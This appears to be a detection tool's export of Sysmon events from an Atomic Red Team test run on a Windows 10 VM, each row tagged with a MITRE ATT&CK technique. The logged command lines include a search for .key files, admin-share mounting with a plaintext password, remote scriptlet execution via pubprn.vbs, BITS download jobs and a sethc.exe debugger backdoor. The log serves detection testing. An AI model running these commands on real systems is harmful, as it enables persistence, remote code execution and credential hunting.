SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547772.335446,2019-07-19T18:49:32.335446+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" ),1," 1 5 4 1 0 0x8000000000000000 3685 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:49:32.284 747F3D96-D87C-5D31-0000-001009453100 5016 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547772.249442,2019-07-19T18:49:32.249442+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" ),1," 1 5 4 1 0 0x8000000000000000 3683 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:49:32.212 747F3D96-D87C-5D31-0000-00107A403100 5984 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547772.180586,2019-07-19T18:49:32.180586+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows ),1," 1 5 4 1 0 0x8000000000000000 3681 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:49:32.135 747F3D96-D87C-5D31-0000-0010E83B3100 2888 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "reg query " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547772.150327,2019-07-19T18:49:32.150327+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 3680 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:49:31.675 747F3D96-D87B-5D31-0000-0010D92D3100 3188 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547737.570057,2019-07-19T18:48:57.570057+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /S /D /c" dir c:\ /b /s .key " ),1," 1 5 4 1 0 0x8000000000000000 3678 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:48:57.532 747F3D96-D859-5D31-0000-001045922F00 6220 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation C:\Windows\system32\cmd.exe /S /D /c" dir c:\ /b /s .key " C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D859-5D31-0000-0010FB8F2F00 888 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "dir c:\ /b /s .key | findstr /e .key" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547737.557947,2019-07-19T18:48:57.557947+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "dir c:\ /b /s .key | findstr /e .key" ),1," 1 5 4 1 0 0x8000000000000000 3677 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:48:57.502 747F3D96-D859-5D31-0000-0010FB8F2F00 888 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "dir c:\ /b /s .key | findstr /e .key" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547737.524876,2019-07-19T18:48:57.524876+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "echo " "ATOMICREDTEAM > %%windir%%\cert.key" ),1," 1 5 4 1 0 0x8000000000000000 3676 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:48:57.433 747F3D96-D859-5D31-0000-0010E68C2F00 6524 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "echo " "ATOMICREDTEAM > %%windir%%\cert.key" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547737.466584,2019-07-19T18:48:57.466584+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 3675 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:48:46.221 747F3D96-D84E-5D31-0000-00102C702F00 1628 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1077] Windows Admin Shares - Process - Created,1563547726.238056,2019-07-19T18:48:46.238056+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator ),1," 1 5 4 1 0 0x8000000000000000 3674 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:48:41.103 747F3D96-D849-5D31-0000-00103C522F00 6068 C:\Windows\System32\net.exe 10.0.17763.1 (WinBuild.160101.0800) Net Command Microsoft® Windows® Operating System Microsoft Corporation net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 747F3D96-D849-5D31-0000-0010E54F2F00 3284 C:\Windows\System32\cmd.exe cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1077] Windows Admin Shares - Network,1563547726.238056,2019-07-19T18:48:46.238056+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator ),1," 1 5 4 1 0 0x8000000000000000 3674 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:48:41.103 747F3D96-D849-5D31-0000-00103C522F00 6068 C:\Windows\System32\net.exe 10.0.17763.1 (WinBuild.160101.0800) Net Command Microsoft® Windows® Operating System Microsoft Corporation net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 747F3D96-D849-5D31-0000-0010E54F2F00 3284 C:\Windows\System32\cmd.exe cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547721.109076,2019-07-19T18:48:41.109076+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator ),1," 1 5 4 1 0 0x8000000000000000 3673 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:48:41.068 747F3D96-D849-5D31-0000-0010E54F2F00 3284 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D849-5D31-0000-0010914D2F00 2096 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "cmd.exe /c " net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547721.085108,2019-07-19T18:48:41.085108+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "cmd.exe /c " net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator ),1," 1 5 4 1 0 0x8000000000000000 3672 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:48:41.034 747F3D96-D849-5D31-0000-0010914D2F00 2096 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "cmd.exe /c " net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547717.347265,2019-07-19T18:48:37.347265+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 3670 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:48:37.099 747F3D96-D845-5D31-0000-001098212F00 2624 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [ T1059 ] wscript or cscript runing script,1563547717.264352,2019-07-19T18:48:37.264352+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine ("C:\Windows\system32\cmd.exe" /c "cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost " script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct) in directory : ( C:\AtomicRedTeam\ )",1," 1 5 4 1 0 0x8000000000000000 3669 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:48:36.869 747F3D96-D844-5D31-0000-0010C70A2F00 2484 C:\Windows\System32\cscript.exe 5.812.10240.16384 Microsoft ® Console Based Script Host Microsoft ® Windows Script Host Microsoft Corporation cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC 747F3D96-D844-5D31-0000-001075082F00 7140 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost " script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547716.882586,2019-07-19T18:48:36.882586+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost " script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct ),1," 1 5 4 1 0 0x8000000000000000 3668 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:48:36.811 747F3D96-D844-5D31-0000-001075082F00 7140 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost " script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547716.834888,2019-07-19T18:48:36.834888+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 3667 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:48:31.222 747F3D96-D83F-5D31-0000-00105EF22E00 4888 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547711.157171,2019-07-19T18:48:31.157171+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /resume AtomicBITS" ),1," 1 5 4 1 0 0x8000000000000000 3665 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:48:31.115 747F3D96-D83F-5D31-0000-001001EC2E00 3760 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /resume AtomicBITS" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547711.04171,2019-07-19T18:48:31.041710+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /complete AtomicBITS" ),1," 1 5 4 1 0 0x8000000000000000 3663 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:48:30.995 747F3D96-D83E-5D31-0000-001046E52E00 4332 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /complete AtomicBITS" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547710.917348,2019-07-19T18:48:30.917348+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1" ),1," 1 5 4 1 0 0x8000000000000000 3661 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:48:30.882 747F3D96-D83E-5D31-0000-001088DE2E00 7072 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547710.807486,2019-07-19T18:48:30.807486+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1" ),1," 1 5 4 1 0 0x8000000000000000 3659 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:48:30.775 747F3D96-D83E-5D31-0000-0010A2D72E00 4036 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547807.299766,2019-07-19T18:50:07.299766+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" ),1," 1 5 4 1 0 0x8000000000000000 3733 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:50:07.254 747F3D96-D89F-5D31-0000-00106C7D3200 864 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547807.279972,2019-07-19T18:50:07.279972+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 3732 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:50:02.238 747F3D96-D89A-5D31-0000-0010F2703200 1132 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High 